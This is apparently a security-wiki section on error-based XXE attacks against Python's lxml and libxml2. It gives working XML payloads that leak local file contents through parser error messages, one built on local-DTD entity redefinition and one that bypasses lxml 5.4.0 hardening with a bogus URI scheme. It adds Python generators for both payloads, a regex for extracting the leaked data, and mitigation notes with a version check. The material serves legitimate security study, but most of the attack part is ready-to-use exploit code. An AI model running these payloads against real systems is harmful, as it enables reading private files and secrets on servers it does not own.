> The Python library **lxml** uses **libxml2** under the hood. Versions prior to **lxml 5.4.0 / libxml2 2.13.8** still expand *parameter* entities even when `resolve_entities=False`, so they remain reachable whenever the application enables `load_dtd=True` and/or `resolve_entities=True`. This enables error-based XXE payloads that embed the contents of local files in the parser's error message.
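
For context, here is a minimal sketch of the kind of application code this applies to. `handle_upload` and `VULNERABLE_PARSER_OPTIONS` are hypothetical names; only `etree.XMLParser` and `etree.fromstring` are real lxml APIs. The two ingredients that matter are `load_dtd=True` and an endpoint that reflects the parser's exception text back to the client.

```python
# Hypothetical vulnerable endpoint (illustrative names only): it parses
# untrusted XML with lxml and echoes parser errors back to the caller.

# DTD loading is on and general-entity resolution is nominally off. On
# lxml < 5.4.0 / libxml2 < 2.13.8, parameter entities are still expanded.
VULNERABLE_PARSER_OPTIONS = {"load_dtd": True, "resolve_entities": False}


def handle_upload(xml_bytes: bytes) -> str:
    """Parse attacker-supplied XML; return the root tag or the error text."""
    from lxml import etree  # lazy import so this sketch loads without lxml

    parser = etree.XMLParser(**VULNERABLE_PARSER_OPTIONS)
    try:
        root = etree.fromstring(xml_bytes, parser)
    except (etree.LxmlError, OSError) as exc:
        # Reflecting the exception message is what turns a parse error into a leak.
        return f"Error : {exc}"
    return root.tag
```
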
#### 1. Exploiting lxml < 5.4.0
1. Identify or create a *local* DTD on disk that references a parameter entity you can **redefine** (e.g. `%config_hex;`).
2. Craft an internal DTD that:
   * Loads the local DTD with `<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">`.
   * Redefines that entity (the first declaration is binding, so the internal one wins) so that it:
     - Reads the target file (`<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">`).
     - Builds another parameter entity that declares `%error;` with an **invalid path** containing the `%flag;` value (`<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">`), so that expanding it triggers a parser error.
3. Finally, expand `%local_dtd;` so that the redefined entity expands `%eval;` and then `%error;`. The parser fails to open `/aaa/<FLAG>` and leaks the flag in the thrown exception, which applications often return to the user.
```xml
<!DOCTYPE colors [
  <!-- local DTD on disk that references %config_hex; -->
  <!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
  <!-- first declaration wins: config.dtd will use this definition -->
  <!ENTITY % config_hex '
    <!ENTITY &#x25; flag SYSTEM "file:///tmp/flag.txt">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///aaa/&#x25;flag;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
```
When the application prints the exception, the response contains:
```
Error : failed to load external entity "file:///aaa/FLAG{secret}"
```
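
Pulling the leaked value out of such a response takes a single regular expression. The sketch below assumes the error text has exactly the shape shown above (`failed to load external entity "<URI>"`); other libxml2/lxml versions may word it differently, and `extract_leak` is a hypothetical helper. The `prefix` parameter is whatever bogus path or URI prefix was placed in front of the file contents.

```python
import re
from typing import Optional

# Matches the "failed to load external entity" message shown above and
# captures the URI libxml2 tried to open. Adjust if your error text differs.
_LOAD_ERROR = re.compile(r'failed to load external entity "([^"]*)"')


def extract_leak(error_text: str, prefix: str = "file:///aaa/") -> Optional[str]:
    """Return the data smuggled after `prefix` in the failing URI, or None."""
    match = _LOAD_ERROR.search(error_text)
    if match is None:
        return None
    uri = match.group(1)
    if not uri.startswith(prefix):
        return None
    # Everything after the bogus prefix is the expanded file contents.
    return uri[len(prefix):]
```

Note that a file containing a double quote would cut the capture short, since the pattern stops at the first `"`.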
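> [!TIP]
> If the parser complains about `%` or `&` characters inside the internal subset, write them as character references (`&#x25;` for `%`, `&#x27;` for `'`), which are decoded only when the enclosing entity is declared; double-encode them (`&#x26;#x25;`) to delay expansion by one more level.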
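
The nesting levels mentioned in the tip are easy to get wrong by hand. The following sketch generates the local-DTD payload with each character reference named explicitly. `build_local_dtd_payload` and its parameters are hypothetical; the defaults are the example paths from this section, and it assumes the local DTD on the target really references the entity passed as `hijacked_entity`.

```python
# Character references for each nesting level.
PCT = "&#x25;"        # becomes '%' when %config_hex; is declared
PCT2 = "&#x26;#x25;"  # becomes '&#x25;' first, then '%' when %eval; is declared
APOS = "&#x27;"       # apostrophe that must not close the outer '...' literal
_FORBIDDEN = "%&'\"<>"


def _check(value: str) -> str:
    """Reject characters that would break the hand-built DTD quoting."""
    if any(ch in value for ch in _FORBIDDEN):
        raise ValueError(f"unsafe character in {value!r}")
    return value


def build_local_dtd_payload(
    local_dtd: str = "file:///tmp/xml/config.dtd",
    hijacked_entity: str = "config_hex",
    target: str = "file:///tmp/flag.txt",
    bogus_prefix: str = "file:///aaa/",
) -> str:
    """Return the error-based local-DTD payload (hypothetical helper)."""
    inner = (
        f'<!ENTITY {PCT} flag SYSTEM "{_check(target)}">'
        f'<!ENTITY {PCT} eval "<!ENTITY {PCT2} error SYSTEM '
        f'{APOS}{_check(bogus_prefix)}{PCT}flag;{APOS}>">'
        f"{PCT}eval;{PCT}error;"
    )
    return (
        "<!DOCTYPE colors [\n"
        f'  <!ENTITY % local_dtd SYSTEM "{_check(local_dtd)}">\n'
        f"  <!ENTITY % {_check(hijacked_entity)} '{inner}'>\n"
        "  %local_dtd;\n"
        "]>\n"
    )
```

Rejecting `%`, `&`, quotes and angle brackets in the inputs keeps the only raw apostrophes the two that delimit the hijacked entity's value.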
#### 2. Bypassing the lxml 5.4.0 hardening (libxml2 still vulnerable)
`lxml` ≥ 5.4.0 forbids *error* parameter entities like the one above, but **libxml2** still allows them to be embedded in a *general* entity. The trick is to:
1. Read the file into a parameter entity `%file;`.
2. Declare another parameter entity that builds a **general** entity `c` whose SYSTEM identifier uses an *unsupported URI scheme* such as `meow://%file;`.
3. Place `&c;` in the XML body. When the parser tries to dereference `meow://…`, it fails and reflects the full URI, including the file contents, in the error message.
```xml
<!DOCTYPE colors [
  <!ENTITY % a '
    <!ENTITY &#x25; file SYSTEM "file:///tmp/flag.txt">
    <!ENTITY &#x25; b "<!ENTITY c SYSTEM &#x27;meow://&#x25;file;&#x27;>">
  '>
  %a;%b;
]>
<colors>&c;</colors>
```
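
The same kind of generator works for the bypass payload. `build_general_entity_payload` is a hypothetical helper; `meow` is only the example scheme from the steps above, and it is an assumption that any other scheme libxml2 cannot resolve behaves the same way.

```python
PCT = "&#x25;"   # becomes '%' when %a; is declared
APOS = "&#x27;"  # apostrophe that must not close the outer '...' literal
_FORBIDDEN = "%&'\"<>"


def _check(value: str) -> str:
    """Reject characters that would break the hand-built DTD quoting."""
    if any(ch in value for ch in _FORBIDDEN):
        raise ValueError(f"unsafe character in {value!r}")
    return value


def build_general_entity_payload(
    target: str = "file:///tmp/flag.txt",
    scheme: str = "meow",
    root: str = "colors",
) -> str:
    """Return the lxml >= 5.4.0 bypass payload (hypothetical helper)."""
    inner = (
        f'<!ENTITY {PCT} file SYSTEM "{_check(target)}">'
        # %b; declares the general entity c, whose URI embeds the file contents
        f'<!ENTITY {PCT} b "<!ENTITY c SYSTEM {APOS}{_check(scheme)}://{PCT}file;{APOS}>">'
    )
    root = _check(root)
    return (
        f"<!DOCTYPE {root} [\n"
        f"  <!ENTITY % a '{inner}'>\n"
        "  %a;%b;\n"  # %b; must come after %a;, which declares it
        "]>\n"
        f"<{root}>&c;</{root}>\n"
    )
```
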
#### Key takeaways
* **Parameter entities** are still expanded by libxml2 even when `resolve_entities=False` is expected to block XXE.
* An **invalid URI** or **non-existent file** is enough to get the target file's contents reflected in the thrown exception.
* The technique works **without outbound connectivity**, making it well suited to strictly egress-filtered environments.
#### Mitigation guidance
* Upgrade to **lxml ≥ 5.4.0** and ensure the underlying **libxml2** is **≥ 2.13.8**.
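
To confirm that a deployment meets both minimums, the versions lxml reports at runtime can be compared against them. This is a sketch: `is_patched` and `runtime_is_patched` are hypothetical helpers, while `etree.LXML_VERSION` and `etree.LIBXML_VERSION` are lxml's own version tuples (the latter is the libxml2 version lxml is running against, which may differ from the one it was compiled with).

```python
# Minimum versions from the mitigation guidance above.
MIN_LXML = (5, 4, 0)
MIN_LIBXML2 = (2, 13, 8)


def is_patched(lxml_version: tuple, libxml2_version: tuple) -> bool:
    """Compare (major, minor, patch) prefixes against both minimums."""
    return (
        tuple(lxml_version[:3]) >= MIN_LXML
        and tuple(libxml2_version[:3]) >= MIN_LIBXML2
    )


def runtime_is_patched() -> bool:
    """Check the lxml/libxml2 pair actually loaded in this interpreter."""
    from lxml import etree  # lazy import so this sketch loads without lxml

    return is_patched(etree.LXML_VERSION, etree.LIBXML_VERSION)
```

Checking the runtime libxml2 version matters because, as described above, lxml 5.4.0 on top of a vulnerable libxml2 is still bypassable.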